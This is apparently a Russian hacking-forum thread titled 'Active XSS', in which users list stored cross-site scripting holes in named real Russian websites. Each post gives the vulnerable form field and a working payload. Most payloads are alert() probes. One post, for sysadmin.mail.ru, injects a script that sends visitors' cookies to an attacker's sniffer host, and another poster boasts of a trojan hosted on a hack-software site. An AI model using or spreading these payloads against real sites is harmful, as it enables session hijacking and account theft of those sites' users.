|
Активные Xss
Тут постим тока активные XSS.
Так же сайт на котором вы нашли xss должен быть более или менее популярным: 1. Он не должен быть расположен на бесплатном хостинге. 2. Так же тиц и pr сайтов должны быть соотвественно не ниже 100 и 3. Сайтов удовлетворяющих этому требованию хоть отбавляй, а вот постить и искать xss на совсем не известных не интресно и не имеет смысла вообще. Желательно (но не обязательно), что бы сайты были на it тематику, или к примеру более менее известные треккеры, порталы. |
Сайт с хак-софтом, там и мой трой лежит))
samouchka.net - когда коммент добавляешь впиши. <img src=http://samouchka.net/engine/data/emoticons/sad.gif onload=XSS] |
www.jjurnal.ru
Довольно популярный жж. Постим сообщение от анонимного пользователя. Уязвимо поле "Имя:" "><script>alert()</script> Работает в опере и ие. |
email.ru
может и было..ибо XSS самая тупая)) .. отправляем письмо ..естестн в html.... Код:
<script>alert()</script>Код:
<img src=javascript:alert()> |
serials.softkiller.net
В теме любого кряка пишем камент с хсс Код:
"><script>alert('xss')</script> |
proplay.ru
proplay.ru
Идём в раздел "Команды": --http://www.proplay.ru/team/ Там создаём новую команду. Уязвимыми являются поля: -Игры -IRC канал -Домашняя страница Test: --http://www.proplay.ru/team/744/ |
sysadmin.mail.ru
Заходи на sysadmin.mail.ru..... Сморим *Сервисы Сисадмина* там лезим в *Моя регистрационная анкета* в поле Крупный город: Выбираем любой город)) далее в поле Свой город/район: строчим Код:
"><script>img = new Image(); img.src = "http://сайт.ru/сниффер.gif?"+document.cookie;</script>после переходим в Whois ..находим наш город...если в списке ников есть наш ник.....значит куки уже на снифе))ибо ненадо даже давать ссылку на свой профиль...просто на город где ваш логин)) :) |
www.qiq.ru
После регистрации, в профиле изменяем уязвимые поля, а именно: 1)Место жительства 2)О себе А этих местах пишем Код:
"><script>alert(/xss/)</script> |
ДОМ 3 ХЭК =))))))
dom3mir.ru Регистрируемся с любыми данными...... Далее идем изменять свою анкету... В уязвимые поля: Район, Метро,Город пишем такой код..ну там уж как придумаете Код:
Москва" onmouseover="alert('xss')" |
http://www.ohizba.ru/index.php?type=page&id=13
уязвимы все поля в гостевой книге фуфло, но баг.. //updat3: Код:
http://www.autolider.info/news/main.php?id=108&cpage=1извините, редактирование не пашет.. если я что-то нарушил, соедините плз посты :) запахало) |
| Время: 20:41 |